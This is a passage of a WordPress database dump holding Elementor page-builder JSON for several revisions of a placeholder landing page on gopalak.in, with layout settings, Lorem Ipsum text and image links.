0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d7d2718\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1196cc3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"66192c8\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5168614\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"4a07d27\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"327ecb6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"334a86c\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"b1f9c2b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"e5344ab\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e1c5968\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7e686a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9d60269\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":101,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5ffd233\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"e2f1149\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4ecb129\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"3e71e0f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ac03799\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aeb1a8b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ea0ea08\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"4632219\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c941f20\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"2c835db\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"cfc2a03\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca58180\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"7cf8f66\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d615689\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f6202dc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2828c5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"f59e578\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"80c0fd8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"08a3c6f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f4344af\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7ae04a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8c99e89\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9f691ad\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"849b2d2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"9f057df\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"92c8f6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f179456\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c4982a2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b9adcb0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4d6d933\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"13bc018\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c14036e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b273e28\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(7592,1362,'_elementor_page_assets','a:0:{}'),(7593,1363,'_elementor_edit_mode','builder'),(7594,1363,'_elementor_template_type','landing-page'),(7595,1363,'_wp_page_template','elementor_canvas'),(7596,1363,'_elementor_version','3.7.6'),(7597,1363,'_elementor_data','[{\"id\":\"cb7724c\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"13bd434\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"97e7cee\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy text \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d7d2718\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1196cc3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"66192c8\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5168614\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"4a07d27\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"327ecb6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"334a86c\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"b1f9c2b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"e5344ab\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e1c5968\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7e686a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9d60269\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":101,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5ffd233\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"e2f1149\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4ecb129\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"3e71e0f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ac03799\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aeb1a8b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ea0ea08\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"4632219\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c941f20\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"2c835db\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"cfc2a03\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca58180\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"7cf8f66\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d615689\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f6202dc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2828c5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"f59e578\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"80c0fd8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"08a3c6f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f4344af\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7ae04a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8c99e89\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9f691ad\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"849b2d2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"9f057df\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"92c8f6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f179456\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c4982a2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b9adcb0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4d6d933\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"13bc018\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c14036e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b273e28\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(7598,1363,'_elementor_page_assets','a:0:{}'),(7599,1364,'_elementor_edit_mode','builder'),(7600,1364,'_elementor_template_type','landing-page'),(7601,1364,'_wp_page_template','elementor_canvas'),(7602,1364,'_elementor_version','3.7.6'),(7603,1364,'_elementor_data','[{\"id\":\"cb7724c\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"13bd434\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"97e7cee\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d7d2718\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1196cc3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"66192c8\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5168614\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"4a07d27\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"327ecb6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"334a86c\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"b1f9c2b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"e5344ab\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e1c5968\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7e686a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9d60269\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":101,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5ffd233\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"e2f1149\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4ecb129\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"3e71e0f\",\"elType\":\